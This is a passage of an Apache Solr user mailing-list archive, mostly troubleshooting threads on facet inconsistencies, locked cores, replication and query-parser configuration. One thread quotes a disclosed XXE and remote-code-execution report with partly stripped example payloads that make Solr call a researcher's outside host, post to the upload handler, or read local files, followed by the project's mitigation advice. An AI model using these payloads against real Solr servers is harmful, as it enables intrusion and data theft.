>> wrote:
>>
>>> bq: ...but the collection wasn't emptied first
>>>
>>> This is what I'd suspect is the problem. Here's the issue: Segments
>>> aren't merged identically on all replicas. So at some point you had
>>> this field indexed without docValues, changed that and re-indexed. But
>>> the segment merging could "read" the first segment it's going to merge
>>> and think it knows about docValues for that field, when in fact that
>>> segment had the old (non-DV) definition.
>>>
>>> This would not necessarily be the same on all replicas even on the _same_
>>> shard.
>>>
>>> This can propagate through all following segment merges IIUC.
>>>
>>> So my bet is that if you index into a new collection, everything will
>>> be fine. You can also just delete everything first, but I usually
>>> prefer a new collection so I'm absolutely and positively sure that the
>>> above can't happen.
>>>
>>> Best,
>>> Erick
>>>
>>> On Wed, Oct 11, 2017 at 12:51 PM, Chris Ulicny  wrote:
>>> > Hi,
>>> >
>>> > We've run into a strange issue with our deployment of solrcloud 6.3.0.
>>> > Essentially, a standard facet query on a string field usually comes back
>>> > empty when it shouldn't. However, every now and again the query actually
>>> > returns the correct values. This is only affecting a single shard in our
>>> > setup.
>>> >
>>> > The behavior pattern generally looks like the query works properly when
>>> it
>>> > hasn't been run recently, and then returns nothing after the query seems
>>> to
>>> > have been cached (< 50ms QTime). Wait a while and you get the correct
>>> > result followed by blanks. It doesn't matter which replica of the shard
>>> is
>>> > queried; the results are the same.
>>> >
>>> > The general query in question looks like
>>> > /select?q=*:*&facet=true&facet.field=market&rows=0&fq=
>>> >
>>> > The field is defined in the schema as >> > docValues="true"/>
>>> >
>>> > There are numerous other fields defined similarly, and they do not
>>> exhibit
>>> > the same behavior when used as the facet.field value. They consistently
>>> > return the right results on the shard 

Re: SOLR cores are getting locked

2017-10-12 Thread Erick Erickson
You might be hitting SOLR-11297, which is fixed in Solr 7.0.1. The
patch should back-port cleanly to 6x versions though.

Best,
Erick

On Thu, Oct 12, 2017 at 12:14 AM, Gunalan V  wrote:
> Hello,
>
> I'm using SOLR 6.5.1 and I have 2 SOLR nodes in SOLRCloud and created
> collection using the below [1] and it was created successfully during
> initial time but next day I tried to restart the nodes in SOLR cloud. When
> I start the first node the collection health is active but when I start the
> second node the collection is became down and could see the locks in the
> logs [2].
>
> Also I have the set the solr home in zookeeper using the command [3].
>
> Did anyone came across this issue? If so please let me know how to fix it.
>
>
> [1]
> http://localhost:8983/solr/admin/collections?action=CREATE&name=testcollection&numShards=2&replicationFactor=2&maxShardsPerNode=2&collection.configName=testconfigs
>
>
> [2]  Caused by: org.apache.lucene.store.LockObtainFailedException: Index
> dir
> '/data01/solr/solr-6.5.1/server/solr/testcollection_shard1_replica2/data/index/'
> of core 'testcollection_shard1_replica2' is already locked. The most likely
> cause is another Solr server (or another solr core in this server) also
> configured to use this directory; other possible causes may be specific to
> lockType: native
> at org.apache.solr.core.SolrCore.initIndex(SolrCore.java:713)
>
>
> [3]  ./solr zk cp file:/data01/solr/solr-6.5.1/server/solr/solr.xml
> zk:/solr.xml -z 10.120.166.12:2181,10.120.166.12:2182,10.120.166.12:2183
>
>
>
> Thanks,
> GVK


Re: Solrcloud replication not working

2017-10-12 Thread solr2020
The problem was that replicationFactor was set to 1. Now replication works
fine with replicationFactor set to 2.
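
For example, creating the collection with two copies of each shard (adjust
the collection name and shard count as needed):

http://localhost:8983/solr/admin/collections?action=CREATE&name=mycollection&numShards=2&replicationFactor=2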



--
Sent from: http://lucene.472066.n3.nabble.com/Solr-User-f472068.html


Re: Inconsistent results for facet queries

2017-10-12 Thread Chris Ulicny
We tested the query on all replicas for the given shard, and they all have
the same issue. So deleting and adding another replica won't fix the
problem since the leader is exhibiting the behavior as well. I believe the
second replica was moved (new one added, old one deleted) between nodes and
so was just a copy of the leader's index after the problematic merge
happened.

bq: Anything that didn't merge old segments, just threw them
away when empty (which was my idea) would possibly require as much
disk space as the index currently occupied, so doesn't help your
disk-constrained situation.

Something like this was originally what I thought might fix the issue: if
we reindex the data for the affected shard, it would possibly delete all
docs from the old segments and just drop them instead of merging them. But
as mentioned, you'd expect the problems to persist through subsequent
merges. So I've got two questions:

1) If the problem persists through merges, does it only affect the segments
being merged, so that Solr comes up empty when it goes looking for the
values there, rather than all segments being affected by a single merge
they weren't a part of?

2) Is it expected that any large tainted segments will eventually merge
with clean segments resulting in more tainted segments as enough docs are
deleted on the large segments?

Also, we aren't disk constrained as much as previously. Reindexing a subset
of docs is possible, but a full clean collection reindex isn't.

Thanks,
Chris


On Thu, Oct 12, 2017 at 11:13 AM Erick Erickson 
wrote:

> Never mind. Anything that didn't merge old segments, just threw them
> away when empty (which was my idea) would possibly require as much
> disk space as the index currently occupied, so doesn't help your
> disk-constrained situation.
>
> Best,
> Erick
>
> On Thu, Oct 12, 2017 at 8:06 AM, Erick Erickson 
> wrote:
> > If it's _only_ on a particular replica, here's what you could do:
> > Just DELETEREPLICA on it, then ADDREPLICA to bring it back. You can
> > define the "node" parameter on ADDREPLICA to get it back on the same
> > node. Then the normal replication process would pull the entire index
> > down from the leader.
> >
> > My bet, though, is that this wouldn't really fix things. While it fixes
> the
> > particular case you've noticed I'd guess others would pop up. You can
> > see what replicas return what by firing individual queries at the
> > particular replica in question with &distrib=false, something like
> >
> solr_server:port/solr/collection1_shard1_replica1/query?distrib=false&blah
> > blah blah
> >
> >
> > bq: It is exceedingly unfortunate that reindexing the data on that shard
> only
> > probably won't end up fixing the problem
> >
> > Well, we've been working on the DWIM (Do What I Mean) feature for years,
> > but progress has stalled.
> >
> > How would that work? You have two segments with vastly different
> > characteristics for a field. You could change the type, the
> multiValued-ness,
> > the analysis chain, there's no end to the things that could go wrong.
> Fixing
> > them actually _is_ impossible given how Lucene is structured.
> >
> > H, you've now given me a brainstorm I'll suggest on the JIRA
> > system after I talk to the dev list
> >
> > Consider indexed=true stored=false. After stemming, "running" can be
> > indexed as "run". At merge time you have no way of knowing that
> > "running" was the original term so you simply couldn't fix it on merge,
> > not to mention that the performance penalty would be...er...
> > severe.
> >
> > Best,
> > Erick
> >
> > On Thu, Oct 12, 2017 at 5:53 AM, Chris Ulicny  wrote:
> >> I thought that decision would come back to bite us somehow. At the
> time, we
> >> didn't have enough space available to do a fresh reindex alongside the
> old
> >> collection, so the only course of action available was to index over the
> >> old one, and the vast majority of its use worked as expected.
> >>
> >> We're planning on upgrading to version 7 at some point in the near
> future
> >> and will have enough space to do a full, clean reindex at that time.
> >>
> >> bq: This can propagate through all following segment merges IIUC.
> >>
> >> It is exceedingly unfortunate that reindexing the data on that shard
> only
> >> probably won't end up fixing the problem.
> >>
> >> Out of curiosity, are there any good write-ups or documentation on how
> two
> >> (or more) lucene segments are merged, or is it just worth looking at the
> >> source code to figure that out?
> >>
> >> Thanks,
> >> Chris
> >>
> >> On Wed, Oct 11, 2017 at 6:55 PM Erick Erickson  >
> >> wrote:
> >>
> >>> bq: ...but the collection wasn't emptied first
> >>>
> >>> This is what I'd suspect is the problem. Here's the issue: Segments
> >>> aren't merged identically on all replicas. So at some point you had
> >>> this field indexed without docValues, changed that and re-indexed. But
> >>> the segment merging could "read" the first segment it's going to merge
> >>> and thi

Unsubscribe my email

2017-10-12 Thread Shashi Roushan
Please unsubscribe my email .

Regards,
Shashi Roushan


Re: Unsubscribe my email

2017-10-12 Thread Erick Erickson
Please follow the instructions here:
http://lucene.apache.org/solr/community.html#mailing-lists-irc. You
must use the _exact_ same e-mail as you used to subscribe.

If the initial try doesn't work and following the suggestions at the
"problems" link doesn't work for you, let us know. But note you need
to show us the _entire_ return header to allow anyone to diagnose the
problem.

Best,
Erick

On Thu, Oct 12, 2017 at 10:07 AM, Shashi Roushan
 wrote:
> Please unsubscribe my email .
>
> Regards,
> Shashi Roushan


Re: Inconsistent results for facet queries

2017-10-12 Thread Erick Erickson
(1) It doesn't matter whether it "affect only segments being merged".
You can't get accurate information if different segments have
different expectations.

(2) I strongly doubt it. The problem is that the "tainted" segments'
meta-data is still read when merging. If the segment consisted of
_only_ deleted documents you'd probably lose it, but it'll be
re-merged long before it consists of exclusively deleted documents.

Really, you have to re-index to be sure, I suspect you can find some
way to do this faster than exploring undefined behavior and hoping.

If you can re-index _anywhere_ to a collection with the same number of
shards you can get this done; it'll take some tricky dancing, but:

0> copy one index directory from each shard someplace safe.
1> reindex somewhere, single-replica will do.
2> Delete all replicas except one for your current collection
3> issue an admin API command fetchindex for each replica in old
collection, pulling the index "from the right place" in the new
collection. It's important that there only be a single replica for
each shard active at this point. These two collections do _not_ need to
be part of the same SolrCloud, the fetchindex command just takes a URL
of the core to fetch from.
4> add the replicas back and let them replicate.

Your installation would be unavailable for searching during steps 2-4 of course.
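
A fetchindex call in step 3 looks roughly like this (hosts, collection and
core names are placeholders):

http://oldhost:8983/solr/oldcollection_shard1_replica1/replication?command=fetchindex&masterUrl=http://newhost:8983/solr/newcollection_shard1_replica1/replication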

Best,
Erick

On Thu, Oct 12, 2017 at 9:01 AM, Chris Ulicny  wrote:
> We tested the query on all replicas for the given shard, and they all have
> the same issue. So deleting and adding another replica won't fix the
> problem since the leader is exhibiting the behavior as well. I believe the
> second replica was moved (new one added, old one deleted) between nodes and
> so was just a copy of the leader's index after the problematic merge
> happened.
>
> bq: Anything that didn't merge old segments, just threw them
> away when empty (which was my idea) would possibly require as much
> disk space as the index currently occupied, so doesn't help your
> disk-constrained situation.
>
> Something like this was originally what I thought might fix the issue. If
> we reindex the data for the affected shard, it would possibly delete all
> docs from the old segments and just drop them instead of merging them. As
> mentioned, you'd expect the problems to persist through subsequent merges.
> So I've got two questions
>
> 1) If the problem persists through merges, does it only affect the segments
> being merged, and then when solr goes looking for the values, it comes up
> empty? Instead of all segments being affected by a single merge they
> weren't a part of.
>
> 2) Is it expected that any large tainted segments will eventually merge
> with clean segments resulting in more tainted segments as enough docs are
> deleted on the large segments?
>
> Also, we aren't disk constrained as much as previously. Reindexing a subset
> of docs is possible, but a full clean collection reindex isn't.
>
> Thanks,
> Chris
>
>
> On Thu, Oct 12, 2017 at 11:13 AM Erick Erickson 
> wrote:
>
>> Never mind. Anything that didn't merge old segments, just threw them
>> away when empty (which was my idea) would possibly require as much
>> disk space as the index currently occupied, so doesn't help your
>> disk-constrained situation.
>>
>> Best,
>> Erick
>>
>> On Thu, Oct 12, 2017 at 8:06 AM, Erick Erickson 
>> wrote:
>> > If it's _only_ on a particular replica, here's what you could do:
>> > Just DELETEREPLICA on it, then ADDREPLICA to bring it back. You can
>> > define the "node" parameter on ADDREPLICA to get it back on the same
>> > node. Then the normal replication process would pull the entire index
>> > down from the leader.
>> >
>> > My bet, though, is that this wouldn't really fix things. While it fixes
>> the
>> > particular case you've noticed I'd guess others would pop up. You can
>> > see what replicas return what by firing individual queries at the
>> > particular replica in question with &distrib=false, something like
>> >
>> solr_server:port/solr/collection1_shard1_replica1/query?distrib=false&blah
>> > blah blah
>> >
>> >
>> > bq: It is exceedingly unfortunate that reindexing the data on that shard
>> only
>> > probably won't end up fixing the problem
>> >
>> > Well, we've been working on the DWIM (Do What I Mean) feature for years,
>> > but progress has stalled.
>> >
>> > How would that work? You have two segments with vastly different
>> > characteristics for a field. You could change the type, the
>> multiValued-ness,
>> > the analysis chain, there's no end to the things that could go wrong.
>> Fixing
>> > them actually _is_ impossible given how Lucene is structured.
>> >
>> > H, you've now given me a brainstorm I'll suggest on the JIRA
>> > system after I talk to the dev list
>> >
>> > Consider indexed=true stored=false. After stemming, "running" can be
>> > indexed as "run". At merge time you have no way of knowing that
>> > "running" was the original term so you simply could

Re: Inconsistent results for facet queries

2017-10-12 Thread Chris Ulicny
I'm not sure if that method is viable for reindexing and fetching the whole
collection at once for us, but unless there is something inherent in that
process which happens at the collection level, we could do it a few shards
at a time since it is a multi-tenant setup.

I'll see if we can set up a small test in QA for this and try it out. This
facet issue is the only one we've noticed, and it can be worked around, so
we might end up just waiting until we reindex for version 7.x to
permanently fix it.

Thanks
Chris

On Thu, Oct 12, 2017 at 1:41 PM Erick Erickson 
wrote:

> (1) It doesn't matter whether it "affect only segments being merged".
> You can't get accurate information if different segments have
> different expectations.
>
> (2) I strongly doubt it. The problem is that the "tainted" segments'
> meta-data is still read when merging. If the segment consisted of
> _only_ deleted documents you'd probably lose it, but it'll be
> re-merged long before it consists of exclusively deleted documents.
>
> Really, you have to re-index to be sure, I suspect you can find some
> way to do this faster than exploring undefined behavior and hoping.
>
> If you can re-index _anywhere_ to a collection with the same number of
> shards you can get this done, it'll take some tricky dancing but
>
> 0> copy one index directory from each shard someplace safe.
> 1> reindex somewhere, single-replica will do.
> 2> Delete all replicas except one for your current collection
> 3> issue an admin API command fetchindex for each replica in old
> collection, pulling the index "from the right place" in the new
> collection. It's important that there only be a single replica for
> each shard active at this point. These two collection do _not_ need to
> be part of the same SolrCloud, the fetchindex command just takes a URL
> of the core to fetch from.
> 4> add the replicas back and let them replicate.
>
> Your installation would be unavailable for searching during steps 2-4 of
> course.
>
> Best,
> Erick
>
> On Thu, Oct 12, 2017 at 9:01 AM, Chris Ulicny  wrote:
> > We tested the query on all replicas for the given shard, and they all
> have
> > the same issue. So deleting and adding another replica won't fix the
> > problem since the leader is exhibiting the behavior as well. I believe
> the
> > second replica was moved (new one added, old one deleted) between nodes
> and
> > so was just a copy of the leader's index after the problematic merge
> > happened.
> >
> > bq: Anything that didn't merge old segments, just threw them
> > away when empty (which was my idea) would possibly require as much
> > disk space as the index currently occupied, so doesn't help your
> > disk-constrained situation.
> >
> > Something like this was originally what I thought might fix the issue. If
> > we reindex the data for the affected shard, it would possibly delete all
> > docs from the old segments and just drop them instead of merging them. As
> > mentioned, you'd expect the problems to persist through subsequent
> merges.
> > So I've got two questions
> >
> > 1) If the problem persists through merges, does it only affect the
> segments
> > being merged, and then when solr goes looking for the values, it comes up
> > empty? Instead of all segments being affected by a single merge they
> > weren't a part of.
> >
> > 2) Is it expected that any large tainted segments will eventually merge
> > with clean segments resulting in more tainted segments as enough docs are
> > deleted on the large segments?
> >
> > Also, we aren't disk constrained as much as previously. Reindexing a
> subset
> > of docs is possible, but a full clean collection reindex isn't.
> >
> > Thanks,
> > Chris
> >
> >
> > On Thu, Oct 12, 2017 at 11:13 AM Erick Erickson  >
> > wrote:
> >
> >> Never mind. Anything that didn't merge old segments, just threw them
> >> away when empty (which was my idea) would possibly require as much
> >> disk space as the index currently occupied, so doesn't help your
> >> disk-constrained situation.
> >>
> >> Best,
> >> Erick
> >>
> >> On Thu, Oct 12, 2017 at 8:06 AM, Erick Erickson <
> erickerick...@gmail.com>
> >> wrote:
> >> > If it's _only_ on a particular replica, here's what you could do:
> >> > Just DELETEREPLICA on it, then ADDREPLICA to bring it back. You can
> >> > define the "node" parameter on ADDREPLICA to get it back on the same
> >> > node. Then the normal replication process would pull the entire index
> >> > down from the leader.
> >> >
> >> > My bet, though, is that this wouldn't really fix things. While it
> fixes
> >> the
> >> > particular case you've noticed I'd guess others would pop up. You can
> >> > see what replicas return what by firing individual queries at the
> >> > particular replica in question with &distrib=false, something like
> >> >
> >>
> solr_server:port/solr/collection1_shard1_replica1/query?distrib=false&blah
> >> > blah blah
> >> >
> >> >
> >> > bq: It is exceedingly unfortunate that reindexing the data on tha

Re: Indexing files from HDFS

2017-10-12 Thread Shawn Heisey

On 10/12/2017 2:04 AM, István wrote:

The question is not about Hue but about why file_path is in the schema for
HDFS files when using search-mr. I am wondering what is the standard way of
indexing files on HDFS.


The error in your original post indicates that at least one document in 
the update request contains a "file_path" field, but the active schema 
on the Solr index does NOT have that field, so Solr is not able to 
handle the indexing request.


It appears that you are using Cloudera software to do the indexing.  If 
you cannot tell why the indexing requests have that field, then you will 
need to talk to Cloudera about how their software works.


One idea that might work is to add the file_path field to your schema 
with a correct type so the indexing requests that are being sent will be 
handled correctly.
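
For example, something along these lines in the schema (this assumes the
tool sends the path as a plain string, and there may be other file_*
metadata fields to add in the same way):

<field name="file_path" type="string" indexed="true" stored="true"/>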


Thanks,
Shawn



Re: Solrcloud replication not working

2017-10-12 Thread Shawn Heisey

On 10/10/2017 2:51 AM, solr2020 wrote:

I could see different versions of the below entries in the leader and the
replica. While indexing, in the replica instance logs we could see it keeps
receiving update requests from the leader, but it says "no changes, skipping
commit".

Master (Searching)  
Master (Replicable) 

There are no other error messages related to replication. Any idea why this
is happening?
Is there an API to run replication manually?


The replication feature (which is what exposes the version numbers you 
have referenced) is *not* a part of normal SolrCloud operation.  
Replication is only used for recovery operations -- when SolrCloud 
determines that a replica has been out of touch with the rest of the 
cloud for enough updates that it must completely overwrite the index 
with a verbatim copy from the leader.  When that kind of recovery is 
required, Solr will temporarily designate one index as a master, another 
index as a slave, and utilize the replication feature to copy the index 
from one to the other.


For SolrCloud, you cannot make any kind of judgement based on the 
replication index version numbers.  It is normal for those numbers to 
vary between replicas.


During normal operation, SolrCloud keeps indexes in sync by performing 
the same indexing operations on all replicas and keeping track of those 
updates in the transaction log.


Regarding your most recent update on the thread, the replicationFactor 
value normally has absolutely no bearing on normal SolrCloud operation.  
Unless your indexes are stored in HDFS with the HDFSDIrectoryFactory, 
the only time Solr ever does anything with replicationFactor is when the 
collection is initially created.


Running Solr as root is not recommended for security reasons, but isn't 
going to cause this problem.


If there are no error messages in your logs, then I would suspect 
problems with the network or with the operating system that are keeping 
your Solr servers from communicating with each other properly.  Is the 
Solr log on the server that is the shard leader also error-free?


Thanks,
Shawn



Re: Getting user-level KeeperException

2017-10-12 Thread Amrit Sarkar
Gunalan,

ZooKeeper throws a KeeperException at /overseer for most Solr issues,
typically around indexing. Match the timestamp of the ZooKeeper error with
the Solr log; the problem most probably lies there.

Amrit Sarkar
Search Engineer
Lucidworks, Inc.
415-589-9269
www.lucidworks.com
Twitter http://twitter.com/lucidworks
LinkedIn: https://www.linkedin.com/in/sarkaramrit2

On Thu, Oct 12, 2017 at 7:52 AM, Gunalan V  wrote:

> Hello,
>
> Could someone please let me know what this user-level keeper exception in
> zookeeper mean? and How to fix the same.
>
>
>
>
>
> Thanks,
> GVK
>


Re: Several critical vulnerabilities discovered in Apache Solr (XXE & RCE)

2017-10-12 Thread Cassandra Targett
Michael,

On behalf of the Lucene PMC, thank you for reporting these issues. Please
be assured we are actively looking into them and are working to provide
resolutions as soon as possible. Somehow no one in the Lucene/Solr
community saw your earlier mail so we have an unfortunate delay in reacting
to this report.

This has been assigned a public CVE (CVE-2017-12629) which we will
reference in future communication about resolution and mitigation steps.

For everyone following this thread, here is what we're doing now:

* Until fixes are available, all Solr users are advised to restart their
Solr instances with the system parameter `-Ddisable.configEdit=true` (an
example start command is shown after this list). This will disallow any changes
to be made to configurations via the Config API. This is a key factor in this
vulnerability, since it allows GET requests to add the RunExecutableListener to
the config.
** This is sufficient to protect you from this type of attack, but means
you cannot use the edit capabilities of the Config API until the other
fixes described below are in place.

* A new release of Lucene/Solr was in the vote phase, but we have now
pulled it back to be able to address these issues in the upcoming 7.1
release. We will also determine mitigation steps for users on earlier
versions, which may include a 6.6.2 release for users still on 6.x.

* The RunExecutableListener will be removed in 7.1. It was previously used
by Solr for index replication but has been replaced and is no longer needed.

* The XML Parser will be fixed and the fixes will be included in the 7.1
release.

* The 7.1 release was already slated to include a change to disable the
`stream.body` parameter by default, which will further help protect systems.
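As an example of the first point above (a sketch only -- substitute your own
ZooKeeper connection string and whatever other startup flags you normally use),
the property can be passed straight to the start script:

  bin/solr stop -all
  bin/solr start -cloud -z zk1:2181,zk2:2181,zk3:2181 -Ddisable.configEdit=true

Alternatively, it can be added to SOLR_OPTS in solr.in.sh so it survives future
restarts:

  SOLR_OPTS="$SOLR_OPTS -Ddisable.configEdit=true"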

We hope you are unable to find any vulnerabilities in the future, but, for
the record, the ASF policy for reporting these types of issues is to email
them to secur...@apache.org only. This is to prevent vulnerabilities from
getting out into the public before fixes can be identified so we avoid
exposing our community to attacks by malicious actors. More information on
these policies is available from the Security Team's website:
https://www.apache.org/security/.

We will have more information shortly about the timing of the 7.1 release
as well as ways for pre-7.0 users to gain access to the fixes for their
versions.

Best,
Cassandra


On Thu, Oct 12, 2017 at 7:16 AM, Michael Stepankin 
wrote:

> Hello,
>
> Could you look at this please. It’s a bit important.
>
> On Fri, 22 Sep 2017 at 01:15, Michael Stepankin 
> wrote:
>
>> Hello
>>
>> We would like to report two important vulnerabilities in the latest
>> Apache Solr distribution. Both of them have a critical risk rating, and they
>> can be chained together to compromise the running Solr server, even by an
>> unprivileged external attacker.
>>
>> *First Vulnerability: XML External Entity Expansion (deftype=xmlparser) *
>>
>> Lucene includes a query parser that is able to create the full spectrum
>> of Lucene queries, using an XML data structure. Starting from version 5.1,
>> Solr supports the "xml" query parser in the search query.
>>
>> The problem is that the Lucene XML parser does not explicitly prohibit
>> DOCTYPE declarations or the expansion of external entities. It is possible to
>> include special entities in the XML document that point to external files
>> (via file://) or external URLs (via http://):
>>
>> Example usage: http://localhost:8983/solr/gettingstarted/select?q={!
>> xmlparser v='http://xxx.s.artsploit.com/xxx
>> "'>'}
>>
>> When Solr is parsing this request, it makes an HTTP request to
>> http://xxx.s.artsploit.com/xxx and treats its content as a DOCTYPE
>> definition.
>>
>> Considering that the parser type can be defined in the search query, which
>> very often comes from untrusted user input (e.g. search fields on websites),
>> this allows an external attacker to make arbitrary HTTP requests to the
>> local Solr instance and to bypass all firewall restrictions.
>>
>> For example, this vulnerability could be used to send malicious data to
>> the '/upload' handler:
>>
>> http://localhost:8983/solr/gettingstarted/select?q={!xmlparser
>> v='http://xxx.s.artsploit.com/
>> solr/gettingstarted/upload?stream.body={"xx":"yy"}&
>> commit=true"'>'}
>>
>> This vulnerability can also be exploited as a blind XXE using the ftp
>> wrapper in order to read arbitrary local files from the Solr server.
>>
>> *Vulnerable code location:*
>> /solr/src/lucene/queryparser/src/java/org/apache/lucene/
>> queryparser/xml/CoreParser.java
>>
>> static Document parseXML(InputStream pXmlFile) throws ParserException {
>> DocumentBuilderFactory dbf = *DocumentBuilderFactory.newInstance*();
>> DocumentBuilder db = null;
>> try {
>>   db = *dbf.newDocumentBuilder*();
>> }
>> catch (Exception se) {
>>   throw new ParserException("XML Parser configuration error", se);
>> }
>> org.w3c.dom.Document doc = null;
>> try {
>>   doc = *db.parse*(*pXmlFile*);
>> }
>>
>>
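For reference, a common way to harden a JAXP parser against this class of
attack -- a generic sketch only, not the actual Lucene/Solr patch -- is to
refuse DOCTYPE declarations and external entities when building the factory:

  import javax.xml.parsers.DocumentBuilder;
  import javax.xml.parsers.DocumentBuilderFactory;
  import javax.xml.parsers.ParserConfigurationException;

  final class SafeXmlParsing {
    static DocumentBuilder hardenedBuilder() throws ParserConfigurationException {
      DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
      // Refusing DOCTYPE declarations blocks external entity expansion outright.
      dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
      // Belt and braces: also disable external general and parameter entities.
      dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);
      dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
      dbf.setXIncludeAware(false);
      dbf.setExpandEntityReferences(false);
      return dbf.newDocumentBuilder();
    }
  }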

Re: Getting user-level KeeperException

2017-10-12 Thread Shawn Heisey

On 10/11/2017 8:22 PM, Gunalan V wrote:
Could someone please let me know what this user-level KeeperException
in ZooKeeper means, and how to fix it?


Those are not errors.  They are INFO logs.  They are not an indication 
of a problem.  If they were a problem, they would most likely be at the 
WARN or ERROR level instead of INFO.


The message indicates that 16 requests came in to create "/overseer" in 
the zookeeper database.  These requests all failed because that entry in 
the database was already there.  The failure is just information, not an 
error.


All of the requests indicate that they came from session ID 
0x35f0e3edd390001.  An earlier entry in the log indicates that this 
session is a connection from 10.138.66.12.


The code in Solr that creates that ZK node looks like it is called in 
MANY places.  One of those places is the code for leader elections.  
This probably means that it gets called at least once for every shard in 
the entire cloud on each Solr node startup, and could be called quite 
frequently for other reasons.


It could be argued that this code in Solr should check for the existence 
of the node before it tries to create it, but as I already said, this 
isn't a problem.
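If you want to see for yourself that the node is simply already there,
ZooKeeper's own command-line client can show it (the host and port below are
placeholders for your own ensemble):

  zkCli.sh -server your.zk.host:2181 ls /overseer
  zkCli.sh -server your.zk.host:2181 stat /overseer

Both commands should succeed on a healthy SolrCloud cluster, which is exactly
why the extra create attempts are rejected.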


Thanks,
Shawn



Disabling XmlQParserPlugin through solrconfig

2017-10-12 Thread Manikandan Sivanesan
I'm looking for a way to disable the query parser XmlQParserPlugin
(org.apache.solr.search.XmlQParserPlugin) through solrconfig.xml .
Following the instructions mentioned here
 to
disable a query parser.

This is the part that I added to solrconfig.

Re: Disabling XmlQParserPlugin through solrconfig

2017-10-12 Thread Manikandan Sivanesan
Sorry, I noticed the typo. I am providing the corrected version.


On Thu, Oct 12, 2017 at 5:18 PM, Manikandan Sivanesan 
wrote:

> I'm looking for a way to disable the query parser XmlQParserPlugin
> (org.apache.solr.search.XmlQParserPlugin) through solrconfig.xml .
> Following the instructions mentioned here
> 
> to disable a query parser.
>
> This is the part that I added to solrconfig.
>  enable="{enable.xmlparser:false}/>
>
> I have uploaded it to zk and reloaded the collection. But I still see the
> XmlQParserPlugin loaded
> in the Plugins / Stats => QUERYPARSER section of the Solr Admin Console.
>
>
> Any advise on this?
> Thank you for your time.
> --
> Manikandan Sivanesan
> Senior Software Engineer
>



-- 
Manikandan Sivanesan
Senior Software Engineer


Re: Disabling XmlQParserPlugin through solrconfig

2017-10-12 Thread Shawn Heisey

On 10/12/2017 3:18 PM, Manikandan Sivanesan wrote:

I'm looking for a way to disable the query parser XmlQParserPlugin
(org.apache.solr.search.XmlQParserPlugin) through solrconfig.xml .
Following the instructions mentioned here
 to
disable a query parser.

This is the part that I added to solrconfig.


Through experimentation, I was able to figure out that the configuration 
of query parsers DOES support the "enable" attribute.  Initially I 
thought it might not.


With this invalid configuration (the class is missing a character), Solr 
will start correctly:




But if I change the enable attribute to "true" instead of "false", Solr 
will NOT successfully load the core with that config, because it 
contains a class that cannot be found.


The actual problem you're running into is that almost every query parser 
implementation that Solr has is hard-coded and explicitly loaded by code 
in QParserPlugin.  One of those parsers is the XML parser that you want 
to disable.


I think it would be a good idea to go through the list of hard-coded 
parsers in the QParserPlugin class and make it a MUCH smaller list.  
Some of the parsers, especially the XML parser, probably should require 
explicit configuration rather than being included by default.
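For reference, the enable attribute is normally written with a system-property
default, along these lines (the parser name and class here are placeholders,
not anything from this thread):

  <queryParser name="myparser" class="com.example.MyQParserPlugin"
               enable="${enable.myparser:false}"/>

As described above, though, this only governs parsers added through
solrconfig.xml; the defaults hard-coded in QParserPlugin are registered
regardless.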


Thanks,
Shawn



Re: Disabling XmlQParserPlugin through solrconfig

2017-10-12 Thread Trey Grainger
You can also just "replace" the registered xml query parser with another
parser. I imagine you're doing this for security reasons, which means you
just want the actual xml query parser to not be executable through a query.
Try adding the following line to your solrconfig.xml:

<queryParser name="xmlparser" class="solr.ExtendedDismaxQParserPlugin"/>
This way, the xml query parser is loaded as a version of the eDismax
query parser instead, and any queries that try to reference the xml
query parser through local params will hit the eDismax query parser
and use its parsing logic.
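One quick way to confirm the override took effect (the collection name below is
a placeholder) is to send a query that names the xmlparser and check the parsed
query in the debug output -- it should now show eDismax-style parsing rather
than an XML-built query:

  http://localhost:8983/solr/yourcollection/select?q={!xmlparser}test&debugQuery=true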

All the best,

Trey Grainger
SVP of Engineering @ Lucidworks
Co-author, Solr in Action 
http://www.treygrainger.com

-

On Thu, Oct 12, 2017 at 6:56 PM, Shawn Heisey  wrote:

> On 10/12/2017 3:18 PM, Manikandan Sivanesan wrote:
>
>> I'm looking for a way to disable the query parser XmlQParserPlugin
>> (org.apache.solr.search.XmlQParserPlugin) through solrconfig.xml .
>> Following the instructions mentioned here
>> 
>> to
>> disable a query parser.
>>
>> This is the part that I added to solrconfig.
>> > enable="{enable.xmlparser:false}/>
>>
>> I have uploaded it to zk and reloaded the collection. But I still see the
>> XmlQParserPlugin loaded in
>> in the Plugin/Stats => QUERYPARSER section of Solr Admin Console.
>>
>
> Through experimentation, I was able to figure out that the configuration
> of query parsers DOES support the "enable" attribute.  Initially I thought
> it might not.
>
> With this invalid configuration (the class is missing a character), Solr
> will start correctly:
>
> 
>
> But if I change the enable attribute to "true" instead of "false", Solr
> will NOT successfully load the core with that config, because it contains a
> class that cannot be found.
>
> The actual problem you're running into is that almost every query parser
> implementation that Solr has is hard-coded and explicitly loaded by code in
> QParserPlugin.  One of those parsers is the XML parser that you want to
> disable.
>
> I think it would be a good idea to go through the list of hard-coded
> parsers in the QParserPlugin class and make it a MUCH smaller list.  Some
> of the parsers, especially the XML parser, probably should require explicit
> configuration rather than being included by default.
>
> Thanks,
> Shawn
>
>


Re: Disabling XmlQParserPlugin through solrconfig

2017-10-12 Thread Manikandan Sivanesan
Thanks a lot. This is the suggestion we are proceeding forward with.

On Thu, Oct 12, 2017 at 7:59 PM, Trey Grainger  wrote:

> You can also just "replace" the registered xml query parser with another
> parser. I imagine you're doing this for security reasons, which means you
> just want the actual xml query parser to not be executable through a query.
> Try adding the following line to your solrconfig.xml:
> <queryParser name="xmlparser" class="solr.ExtendedDismaxQParserPlugin"/>
>
> This way, the xml query parser is loaded as a version of the eDismax
> query parser instead, and any queries that try to reference the xml
> query parser through local params will hit the eDismax query parser
> and use its parsing logic.
>
> All the best,
>
> Trey Grainger
> SVP of Engineering @ Lucidworks
> Co-author, Solr in Action 
> http://www.treygrainger.com
>
> -
>
> On Thu, Oct 12, 2017 at 6:56 PM, Shawn Heisey  wrote:
>
> > On 10/12/2017 3:18 PM, Manikandan Sivanesan wrote:
> >
> >> I'm looking for a way to disable the query parser XmlQParserPlugin
> >> (org.apache.solr.search.XmlQParserPlugin) through solrconfig.xml .
> >> Following the instructions mentioned here
> >>  >
> >> to
> >> disable a query parser.
> >>
> >> This is the part that I added to solrconfig.
> >>  >> enable="{enable.xmlparser:false}/>
> >>
